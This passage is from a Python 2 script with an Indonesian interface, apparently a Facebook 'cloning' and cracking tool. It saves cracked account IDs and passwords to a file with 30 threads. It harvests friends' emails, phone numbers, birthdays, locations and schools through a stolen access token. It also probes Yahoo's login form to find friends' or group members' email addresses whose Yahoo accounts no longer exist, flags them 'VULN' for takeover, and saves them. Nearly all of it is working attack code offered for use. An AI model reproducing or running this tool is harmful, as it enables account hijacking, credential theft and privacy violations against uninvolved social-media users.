| 434 | 434 | print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name'] |
| 435 | 435 | print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user |
| 436 | 436 | print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass6 + '\n' |
| 437 | 437 | cek = open("out/super\_cp.txt", "a") |
| 438 | 438 | cek.write("ID:" +user+ " Pw:" +pass6+"\n") |
| 439 | 439 | cek.close() |
| 440 | 440 | cekpoint.append(user+pass6) |
| 441 | 441 | except: |
| 442 | 442 | pass |
| 443 | 443 |  |
| 444 | 444 | p = ThreadPool(30) |
| 445 | 445 | p.map(main, id) |
| 446 | 446 | print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....' |
| 447 | 447 | print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint)) |
| 448 | 448 | print("\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super\_cp.txt") |
| 449 | 449 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 450 | 450 | super() |
| 451 | 451 |  |
| 452 | 452 |  |
| 453 | 453 | def grupsaya(): |
| 454 | 454 | os.system('clear') |
| 455 | 455 | try: |
| 456 | 456 | toket=open('login.txt','r').read() |
| 457 | 457 | except IOError: |
| 458 | 458 | print"\033[1;96m[!] \x1b[1;91mToken invalid" |
| 459 | 459 | os.system('rm -rf login.txt') |
| 460 | 460 | time.sleep(1) |
| 461 | 461 | keluar() |
| 462 | 462 | try: |
| 463 | 463 | os.mkdir('out') |
| 464 | 464 | except OSError: |
| 465 | 465 | pass |
| 466 | 466 | os.system('clear') |
| 467 | 467 | print logo |
| 468 | 468 | print 42\*"\033[1;96m=" |
| 469 | 469 | try: |
| 470 | 470 | uh = requests.get('https://graph.facebook.com/me/groups?access\_token='+toket) |
| 471 | 471 | gud = json.loads(uh.text) |
| 472 | 472 | for p in gud['data']: |
| 473 | 473 | nama = p["name"] |
| 474 | 474 | id = p["id"] |
| 475 | 475 | f=open('out/Grupid.txt','w') |
| 476 | 476 | listgrup.append(id) |
| 477 | 477 | f.write(id + '\n') |
| 478 | 478 | print("\033[1;96m[✓] \033[1;92mGROUP SAYA") |
| 479 | 479 | print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+str(id)) |
| 480 | 480 | print("\033[1;96m[➹] \033[1;97mNama\033[1;91m: \033[1;92m"+str(nama) + '\n') |
| 481 | 481 | print 42\*"\033[1;96m=" |
| 482 | 482 | print"\033[1;96m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup)) |
| 483 | 483 | print("\033[1;96m[+] \033[1;92mTersimpan \033[1;91m: \033[1;97mout/Grupid.txt") |
| 484 | 484 | f.close() |
| 485 | 485 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 486 | 486 | menu() |
| 487 | 487 | except (KeyboardInterrupt,EOFError): |
| 488 | 488 | print("\033[1;96m[!] \x1b[1;91mTerhenti") |
| 489 | 489 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 490 | 490 | menu() |
| 491 | 491 | except KeyError: |
| 492 | 492 | os.remove('out/Grupid.txt') |
| 493 | 493 | print('\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan') |
| 494 | 494 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 495 | 495 | menu() |
| 496 | 496 | except requests.exceptions.ConnectionError: |
| 497 | 497 | print"\033[1;96m[✖] \x1b[1;91mTidak ada koneksi" |
| 498 | 498 | keluar() |
| 499 | 499 | except IOError: |
| 500 | 500 | print "\033[1;96m[!] \x1b[1;91mError" |
| 501 | 501 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 502 | 502 | menu() |
| 503 | 503 |  |
| 504 | 504 | def informasi(): |
| 505 | 505 | os.system('clear') |
| 506 | 506 | try: |
| 507 | 507 | toket=open('login.txt','r').read() |
| 508 | 508 | except IOError: |
| 509 | 509 | print"\033[1;91m[!] Token invalid" |
| 510 | 510 | os.system('rm -rf login.txt') |
| 511 | 511 | time.sleep(1) |
| 512 | 512 | keluar() |
| 513 | 513 | os.system('clear') |
| 514 | 514 | print logo |
| 515 | 515 | print 42\*"\033[1;96m=" |
| 516 | 516 | aid = raw\_input('\033[1;96m[+] \033[1;93mMasukan ID/Nama\033[1;91m : \033[1;97m') |
| 517 | 517 | jalan('\033[1;96m[✺] \033[1;93mTunggu sebentar \033[1;97m...') |
| 518 | 518 | r = requests.get('https://graph.facebook.com/me/friends?access\_token='+toket) |
| 519 | 519 | cok = json.loads(r.text) |
| 520 | 520 | for i in cok['data']: |
| 521 | 521 | if aid in i['name'] or aid in i['id']: |
| 522 | 522 | x = requests.get("https://graph.facebook.com/"+i['id']+"?access\_token="+toket) |
| 523 | 523 | z = json.loads(x.text) |
| 524 | 524 | print 43\*"\033[1;96m=" |
| 525 | 525 | try: |
| 526 | 526 | print '\033[1;96m[➹] \033[1;93mNama\033[1;97m : '+z['name'] |
| 527 | 527 | except KeyError: print '\033[1;96m[?] \033[1;93mNama\033[1;97m : \033[1;91mTidak ada' |
| 528 | 528 | try: |
| 529 | 529 | print '\033[1;96m[➹] \033[1;93mID\033[1;97m : '+z['id'] |
| 530 | 530 | except KeyError: print '\033[1;96m[?] \033[1;93mID\033[1;97m : \033[1;91mTidak ada' |
| 531 | 531 | try: |
| 532 | 532 | print '\033[1;96m[➹] \033[1;93mEmail\033[1;97m : '+z['email'] |
| 533 | 533 | except KeyError: print '\033[1;96m[?] \033[1;93mEmail\033[1;97m : \033[1;91mTidak ada' |
| 534 | 534 | try: |
| 535 | 535 | print '\033[1;96m[➹] \033[1;93mNo HP\033[1;97m : '+z['mobile\_phone'] |
| 536 | 536 | except KeyError: print '\033[1;96m[?] \033[1;93mNo HP\033[1;97m : \033[1;91mTidak ada' |
| 537 | 537 | try: |
| 538 | 538 | print '\033[1;96m[➹] \033[1;93mTempat tinggal\033[1;97m: '+z['location']['name'] |
| 539 | 539 | except KeyError: print '\033[1;96m[?] \033[1;93mTempat tinggal\033[1;97m: \033[1;91mTidak ada' |
| 540 | 540 | try: |
| 541 | 541 | print '\033[1;96m[➹] \033[1;93mTanggal lahir\033[1;97m : '+z['birthday'] |
| 542 | 542 | except KeyError: print '\033[1;96m[?] \033[1;93mTanggal lahir\033[1;97m : \033[1;91mTidak ada' |
| 543 | 543 | try: |
| 544 | 544 | print '\033[1;96m[➹] \033[1;93mSekolah\033[1;97m : ' |
| 545 | 545 | for q in z['education']: |
| 546 | 546 | try: |
| 547 | 547 | print '\033[1;91m ~ \033[1;97m'+q['school']['name'] |
| 548 | 548 | except KeyError: print '\033[1;91m ~ \033[1;91mTidak ada' |
| 549 | 549 | except KeyError: pass |
| 550 | 550 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 551 | 551 | menu() |
| 552 | 552 | else: |
| 553 | 553 | pass |
| 554 | 554 | else: |
| 555 | 555 | print"\033[1;96m[✖] \x1b[1;91mAkun tidak ditemukan" |
| 556 | 556 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 557 | 557 | menu() |
| 558 | 558 |  |
| 559 | 559 | def yahoo(): |
| 560 | 560 | global toket |
| 561 | 561 | os.system('clear') |
| 562 | 562 | try: |
| 563 | 563 | toket=open('login.txt','r').read() |
| 564 | 564 | except IOError: |
| 565 | 565 | print"\033[1;91m[!] Token invalid" |
| 566 | 566 | os.system('rm -rf login.txt') |
| 567 | 567 | time.sleep(1) |
| 568 | 568 | keluar() |
| 569 | 569 | os.system('clear') |
| 570 | 570 | print logo |
| 571 | 571 | print 42\*"\033[1;96m=" |
| 572 | 572 | print "\x1b[1;97m1.\x1b[1;93m Clone dari daftar teman" |
| 573 | 573 | print "\x1b[1;97m2.\x1b[1;93m Clone dari teman" |
| 574 | 574 | print "\x1b[1;97m3.\x1b[1;93m Clone dari member group" |
| 575 | 575 | print "\x1b[1;97m4.\x1b[1;93m Clone dari file" |
| 576 | 576 | print "\n\x1b[1;91m0.\x1b[1;91m Kembali" |
| 577 | 577 | clone() |
| 578 | 578 |  |
| 579 | 579 | def clone(): |
| 580 | 580 | embuh = raw\_input("\n\x1b[1;97m >>> ") |
| 581 | 581 | if embuh =="": |
| 582 | 582 | print "\033[1;96m[!] \x1b[1;91mIsi yang benar" |
| 583 | 583 | elif embuh =="1": |
| 584 | 584 | clone\_dari\_daftar\_teman() |
| 585 | 585 | elif embuh =="2": |
| 586 | 586 | clone\_dari\_teman() |
| 587 | 587 | elif embuh =="3": |
| 588 | 588 | clone\_dari\_member\_group() |
| 589 | 589 | elif embuh =="4": |
| 590 | 590 | clone\_dari\_file() |
| 591 | 591 | elif embuh =="0": |
| 592 | 592 | menu() |
| 593 | 593 | else: |
| 594 | 594 | print "\033[1;96m[!] \x1b[1;91mIsi yang benar" |
| 595 | 595 |  |
| 596 | 596 |  |
| 597 | 597 | def clone\_dari\_daftar\_teman(): |
| 598 | 598 | global toket |
| 599 | 599 | os.system('reset') |
| 600 | 600 | try: |
| 601 | 601 | toket=open('login.txt','r').read() |
| 602 | 602 | except IOError: |
| 603 | 603 | print"\033[1;91m[!] Token Invalid" |
| 604 | 604 | os.system('rm -rf login.txt') |
| 605 | 605 | time.sleep(1) |
| 606 | 606 | keluar() |
| 607 | 607 | try: |
| 608 | 608 | os.mkdir('out') |
| 609 | 609 | except OSError: |
| 610 | 610 | pass |
| 611 | 611 | os.system('clear') |
| 612 | 612 | print logo |
| 613 | 613 | mpsh = [] |
| 614 | 614 | jml = 0 |
| 615 | 615 | print 42\*"\033[1;96m=" |
| 616 | 616 | jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mMengambil email \033[1;97m...') |
| 617 | 617 | teman = requests.get('https://graph.facebook.com/me/friends?access\_token='+toket) |
| 618 | 618 | kimak = json.loads(teman.text) |
| 619 | 619 | jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mStart \033[1;97m...') |
| 620 | 620 | print ('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z') |
| 621 | 621 | print 42\*"\033[1;96m=" |
| 622 | 622 | for w in kimak['data']: |
| 623 | 623 | jml +=1 |
| 624 | 624 | mpsh.append(jml) |
| 625 | 625 | id = w['id'] |
| 626 | 626 | nama = w['name'] |
| 627 | 627 | links = requests.get("https://graph.facebook.com/"+id+"?access\_token="+toket) |
| 628 | 628 | z = json.loads(links.text) |
| 629 | 629 | try: |
| 630 | 630 | mail = z['email'] |
| 631 | 631 | yahoo = re.compile(r'@.\*') |
| 632 | 632 | otw = yahoo.search(mail).group() |
| 633 | 633 | if 'yahoo.com' in otw: |
| 634 | 634 | br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com") |
| 635 | 635 | br.\_factory.is\_html = True |
| 636 | 636 | br.select\_form(nr=0) |
| 637 | 637 | br["username"] = mail |
| 638 | 638 | klik = br.submit().read() |
| 639 | 639 | jok = re.compile(r'"messages.ERROR\_INVALID\_USERNAME">.\*') |
| 640 | 640 | try: |
| 641 | 641 | pek = jok.search(klik).group() |
| 642 | 642 | except: |
| 643 | 643 | continue |
| 644 | 644 | if '"messages.ERROR\_INVALID\_USERNAME">' in pek: |
| 645 | 645 | print("\033[1;96m[✓] \033[1;92mVULN") |
| 646 | 646 | print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id) |
| 647 | 647 | print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail) |
| 648 | 648 | print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama+ '\n') |
| 649 | 649 | save = open('out/MailVuln.txt','a') |
| 650 | 650 | save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n') |
| 651 | 651 | save.close() |
| 652 | 652 | berhasil.append(mail) |
| 653 | 653 | except KeyError: |
| 654 | 654 | pass |
| 655 | 655 | print 42\*"\033[1;96m=" |
| 656 | 656 | print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....' |
| 657 | 657 | print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil)) |
| 658 | 658 | print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/MailVuln.txt" |
| 659 | 659 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 660 | 660 | menu() |
| 661 | 661 |  |
| 662 | 662 |  |
| 663 | 663 | def clone\_dari\_teman(): |
| 664 | 664 | global toket |
| 665 | 665 | os.system('clear') |
| 666 | 666 | try: |
| 667 | 667 | toket=open('login.txt','r').read() |
| 668 | 668 | except IOError: |
| 669 | 669 | print"\033[1;96m[!] \x1b[1;91mToken invalid" |
| 670 | 670 | os.system('rm -rf login.txt') |
| 671 | 671 | time.sleep(1) |
| 672 | 672 | keluar() |
| 673 | 673 | try: |
| 674 | 674 | os.mkdir('out') |
| 675 | 675 | except OSError: |
| 676 | 676 | pass |
| 677 | 677 | os.system('clear') |
| 678 | 678 | print logo |
| 679 | 679 | mpsh = [] |
| 680 | 680 | jml = 0 |
| 681 | 681 | print 42\*"\033[1;96m=" |
| 682 | 682 | idt = raw\_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m") |
| 683 | 683 | try: |
| 684 | 684 | jok = requests.get("https://graph.facebook.com/"+idt+"?access\_token="+toket) |
| 685 | 685 | op = json.loads(jok.text) |
| 686 | 686 | print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama\033[1;91m :\033[1;97m "+op["name"] |
| 687 | 687 | except KeyError: |
| 688 | 688 | print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan" |
| 689 | 689 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 690 | 690 | menu() |
| 691 | 691 | jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...') |
| 692 | 692 | teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access\_token='+toket) |
| 693 | 693 | kimak = json.loads(teman.text) |
| 694 | 694 | jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...') |
| 695 | 695 | print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z') |
| 696 | 696 | print 43\*"\033[1;96m=" |
| 697 | 697 | for w in kimak['data']: |
| 698 | 698 | jml +=1 |
| 699 | 699 | mpsh.append(jml) |
| 700 | 700 | id = w['id'] |
| 701 | 701 | nama = w['name'] |
| 702 | 702 | links = requests.get("https://graph.facebook.com/"+id+"?access\_token="+toket) |
| 703 | 703 | z = json.loads(links.text) |
| 704 | 704 | try: |
| 705 | 705 | mail = z['email'] |
| 706 | 706 | yahoo = re.compile(r'@.\*') |
| 707 | 707 | otw = yahoo.search(mail).group() |
| 708 | 708 | if 'yahoo.com' in otw: |
| 709 | 709 | br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com") |
| 710 | 710 | br.\_factory.is\_html = True |
| 711 | 711 | br.select\_form(nr=0) |
| 712 | 712 | br["username"] = mail |
| 713 | 713 | klik = br.submit().read() |
| 714 | 714 | jok = re.compile(r'"messages.ERROR\_INVALID\_USERNAME">.\*') |
| 715 | 715 | try: |
| 716 | 716 | pek = jok.search(klik).group() |
| 717 | 717 | except: |
| 718 | 718 | continue |
| 719 | 719 | if '"messages.ERROR\_INVALID\_USERNAME">' in pek: |
| 720 | 720 | print("\033[1;96m[✓] \033[1;92mVULN") |
| 721 | 721 | print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id) |
| 722 | 722 | print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail) |
| 723 | 723 | print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama) |
| 724 | 724 | save = open('out/TemanMailVuln.txt','a') |
| 725 | 725 | save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n') |
| 726 | 726 | save.close() |
| 727 | 727 | berhasil.append(mail) |
| 728 | 728 | except KeyError: |
| 729 | 729 | pass |
| 730 | 730 | print 42\*"\033[1;96m=" |
| 731 | 731 | print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....' |
| 732 | 732 | print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil)) |
| 733 | 733 | print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/TemanMailVuln.txt" |
| 734 | 734 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 735 | 735 | menu() |
| 736 | 736 |  |
| 737 | 737 | def clone\_dari\_member\_group(): |
| 738 | 738 | global toket |
| 739 | 739 | os.system('clear') |
| 740 | 740 | try: |
| 741 | 741 | toket=open('login.txt','r').read() |
| 742 | 742 | except IOError: |
| 743 | 743 | print"\033[1;96m[!] \x1b[1;91mToken invalid" |
| 744 | 744 | os.system('rm -rf login.txt') |
| 745 | 745 | time.sleep(1) |
| 746 | 746 | keluar() |
| 747 | 747 | try: |
| 748 | 748 | os.mkdir('out') |
| 749 | 749 | except OSError: |
| 750 | 750 | pass |
| 751 | 751 | os.system('clear') |
| 752 | 752 | print logo |
| 753 | 753 | mpsh = [] |
| 754 | 754 | jml = 0 |
| 755 | 755 | print 42\*"\033[1;96m=" |
| 756 | 756 | id=raw\_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ') |
| 757 | 757 | try: |
| 758 | 758 | r=requests.get('https://graph.facebook.com/group/?id='+id+'&access\_token='+toket) |
| 759 | 759 | asw=json.loads(r.text) |
| 760 | 760 | print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name'] |
| 761 | 761 | except KeyError: |
| 762 | 762 | print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan" |
| 763 | 763 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 764 | 764 | menu() |
| 765 | 765 | jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...') |
| 766 | 766 | teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access\_token='+toket) |
| 767 | 767 | kimak = json.loads(teman.text) |
| 768 | 768 | jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...') |
| 769 | 769 | print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z') |
| 770 | 770 | print 42\*"\033[1;96m=" |
| 771 | 771 | for w in kimak['data']: |
| 772 | 772 | jml +=1 |
| 773 | 773 | mpsh.append(jml) |
| 774 | 774 | id = w['id'] |
| 775 | 775 | nama = w['name'] |
| 776 | 776 | links = requests.get("https://graph.facebook.com/"+id+"?access\_token="+toket) |
| 777 | 777 | z = json.loads(links.text) |
| 778 | 778 | try: |
| 779 | 779 | mail = z['email'] |
| 780 | 780 | yahoo = re.compile(r'@.\*') |
| 781 | 781 | otw = yahoo.search(mail).group() |
| 782 | 782 | if 'yahoo.com' in otw: |
| 783 | 783 | br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com") |
| 784 | 784 | br.\_factory.is\_html = True |
| 785 | 785 | br.select\_form(nr=0) |
| 786 | 786 | br["username"] = mail |
| 787 | 787 | klik = br.submit().read() |
| 788 | 788 | jok = re.compile(r'"messages.ERROR\_INVALID\_USERNAME">.\*') |
| 789 | 789 | try: |
| 790 | 790 | pek = jok.search(klik).group() |
| 791 | 791 | except: |
| 792 | 792 | continue |
| 793 | 793 | if '"messages.ERROR\_INVALID\_USERNAME">' in pek: |
| 794 | 794 | print("\033[1;96m[✓] \033[1;92mVULN") |
| 795 | 795 | print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id) |
| 796 | 796 | print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail) |
| 797 | 797 | print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama) |
| 798 | 798 | save = open('out/GrupMailVuln.txt','a') |
| 799 | 799 | save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n') |
| 800 | 800 | save.close() |
| 801 | 801 | berhasil.append(mail) |
| 802 | 802 | except KeyError: |
| 803 | 803 | pass |
| 804 | 804 | print 42\*"\033[1;96m=" |
| 805 | 805 | print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....' |
| 806 | 806 | print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil)) |
| 807 | 807 | print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/GrupMailVuln.txt" |
| 808 | 808 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 809 | 809 | menu() |
| 810 | 810 |  |
| 811 | 811 |  |
| 812 | 812 | def clone\_dari\_file(): |
| 813 | 813 | global toket |
| 814 | 814 | os.system('clear') |
| 815 | 815 | try: |
| 816 | 816 | toket=open('login.txt','r').read() |
| 817 | 817 | except IOError: |
| 818 | 818 | print"\033[1;96m[!] \x1b[1;91mToken invalid" |
| 819 | 819 | os.system('rm -rf login.txt') |
| 820 | 820 | time.sleep(1) |
| 821 | 821 | keluar() |
| 822 | 822 | try: |
| 823 | 823 | os.mkdir('out') |
| 824 | 824 | except OSError: |
| 825 | 825 | pass |
| 826 | 826 | os.system('clear') |
| 827 | 827 | print logo |
| 828 | 828 | print 42\*"\033[1;96m=" |
| 829 | 829 | files = raw\_input("\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m") |
| 830 | 830 | try: |
| 831 | 831 | total = open(files,"r") |
| 832 | 832 | mail = total.readlines() |
| 833 | 833 | except IOError: |
| 834 | 834 | print"\033[1;96m[!] \x1b[1;91mFile tidak ditemukan" |
| 835 | 835 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 836 | 836 | menu() |
| 837 | 837 | mpsh = [] |
| 838 | 838 | jml = 0 |
| 839 | 839 | jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...') |
| 840 | 840 | print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z') |
| 841 | 841 | print 42\*"\033[1;96m=" |
| 842 | 842 | mail = open(files,"r").readlines() |
| 843 | 843 | for pw in mail: |
| 844 | 844 | mail = pw.replace("\n","") |
| 845 | 845 | jml +=1 |
| 846 | 846 | mpsh.append(jml) |
| 847 | 847 | yahoo = re.compile(r'@.\*') |
| 848 | 848 | otw = yahoo.search(mail).group() |
| 849 | 849 | if 'yahoo.com' in otw: |
| 850 | 850 | br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com") |
| 851 | 851 | br.\_factory.is\_html = True |
| 852 | 852 | br.select\_form(nr=0) |
| 853 | 853 | br["username"] = mail |
| 854 | 854 | klik = br.submit().read() |
| 855 | 855 | jok = re.compile(r'"messages.ERROR\_INVALID\_USERNAME">.\*') |
| 856 | 856 | try: |
| 857 | 857 | pek = jok.search(klik).group() |
| 858 | 858 | except: |
| 859 | 859 | continue |
| 860 | 860 | if '"messages.ERROR\_INVALID\_USERNAME">' in pek: |
| 861 | 861 | print("\033[1;96m[✓] \033[1;92mVULN") |
| 862 | 862 | print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail) |
| 863 | 863 | save = open('out/MailVuln.txt','a') |
| 864 | 864 | save.write("Email: "+ mail + '\n\n') |
| 865 | 865 | save.close() |
| 866 | 866 | berhasil.append(mail) |
| 867 | 867 | print 42\*"\033[1;96m=" |
| 868 | 868 | print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....' |
| 869 | 869 | print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil)) |
| 870 | 870 | print"\033[1;96m[+] \033[1;92mFile Tersimpan \033[1;91m:\033[1;97m out/FileMailVuln.txt" |
| 871 | 871 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 872 | 872 | menu() |
| 873 | 873 |  |
| 874 | 874 |  |
| 875 | 875 |  |
| 876 | 876 | if \_\_name\_\_ == '\_\_main\_\_': |
| 877 | 877 | siapa() |